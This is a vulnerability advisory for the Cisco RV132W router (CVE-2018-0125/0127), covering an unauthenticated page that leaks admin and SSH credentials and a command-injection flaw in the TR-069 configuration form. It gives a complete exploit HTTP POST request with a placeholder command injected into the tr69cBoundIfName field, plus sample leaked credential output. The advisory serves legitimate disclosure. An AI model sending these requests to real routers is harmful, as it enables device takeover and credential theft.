Cisco RV132W Multiple Vulnerabilities(CVE-2018-0125/CVE-2018-0127)

Vulnerabilities Summary

The following advisory describes two (2) vulnerabilities found in Cisco RV132W Wireless N VPN version 1.0.1.8

The Cisco RV132W Wireless-N ADSL2+ VPN Router is “easy to use, set up, and deploy. This flexible router offers great performance and is suited for small or home offices (SOHO) and smaller deployments.”

The vulnerabilities found are:

• Information Disclosure That Leads to Password Disclosure
• Unauthenticated WAN Remote Code Execution

Credit

A security researcher from, NHSC, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program

Vendor response

Cisco were informed of the vulnerabilities and released patches to address them: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x

CVE: CVE-2018-0125 / CVE-2018-0127

Vulnerabilities details

Information Disclosure that Leads to Password Disclosure

User controlled input is not sufficiently filtered, unauthenticated user can access the following page:

http://[TARGET_IP]/dumpmdm.cmd

The output will include the admin SSH password (base64)

<AdminUserName>redalert</AdminUserName>
 <AdminPassword>61eac78956b08e9b7c499691eddbe2e2</AdminPassword>
 <AdminPasswordHash>(null)</AdminPasswordHash>
 <AdminCliEnable>TRUE</AdminCliEnable>
 <SupportUserName>support</SupportUserName>
 <SupportPassword>support</SupportPassword>
 <SupportPasswordHash>(null)</SupportPasswordHash>
 <SupportCliEnable>TRUE</SupportCliEnable>
 <UserUserName>user</UserUserName>
 <UserPassword>user</UserPassword>
 <UserPasswordHash>(null)</UserPasswordHash>
 <UserCliEnable>TRUE</UserCliEnable>
 <logintimeout>30</logintimeout>
 <SetAdminUser>TRUE</SetAdminUser>
 <SetGuestUser>FALSE</SetGuestUser>
 <EnableAdminUser>TRUE</EnableAdminUser>
 <EnableGuestUser>FALSE</EnableGuestUser>
 <GuestUserName>guest</GuestUserName>
 <GuestPassword>574ea313a3b02211d193d01606942111</GuestPassword>
 <GuestPasswordHash>(null)</GuestPasswordHash>
 <GuestCliEnable>TRUE</GuestCliEnable>
 <GuestUserIsInUse>FALSE</GuestUserIsInUse>
 <FirstLogin>TRUE</FirstLogin>
 <GuestLoginTimeout>30</GuestLoginTimeout>
 <loginchecked>0</loginchecked>
 <sshpass>cmVkYWxlcnQxMzIkAA==</sshpass>

Decoding: “cmVkYWxlcnQxMzIkAA==” base64 decodes to “redalert132$” which is our test unit password.

Unauthenticated WAN Remote Code Execution

User controlled input is not sufficiently filtered, unauthenticated user can access the following page:

http://[TARGET_IP]/tr69cfg.cgi

By sending POST request with modify parameter tr69cBoundIfName= an unauthenticated user can execute arbitrary code on the victims router

POST /tr69cfg.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/2010010
1 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 627
Referer: http://192.168.1.1/tr69cfg.cgi
Connection: close
Upgrade-Insecure-Requests: 1
 
submit_button=Basic_config&tr69cEnable=1&tr69cInformEnable=1&ipvEnable=0&tr69cInformInterval=300&tr69cAcsURL=http%3A%2F%2F192.168.1.1&tr69cAcsUser=admin&tr69cAcsPwd=admin&tr69cConnReqUser=admin&tr69cConnReqPwd=admin&tr69cConnReqPort=7547&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0&tr69cAcsCert=&tr69cCpeCert=&downloadFileType=&tr69cBoundIfName=;COMMAND-TO-RUN;&tr69cBindInterface=ETH_WAN_R&tr69=on&ipv=on&inform=on&informInterval=300&httpCategory=http%3A%2F%2F&acsURL=192.168.1.1&acsUser=admin&acsPwd=admin&debug=on&FileType=on&connReqAuth=on&connReqUser=admin&connReqPwd=admin&connReqPort=7547&WANInterface=eth0.1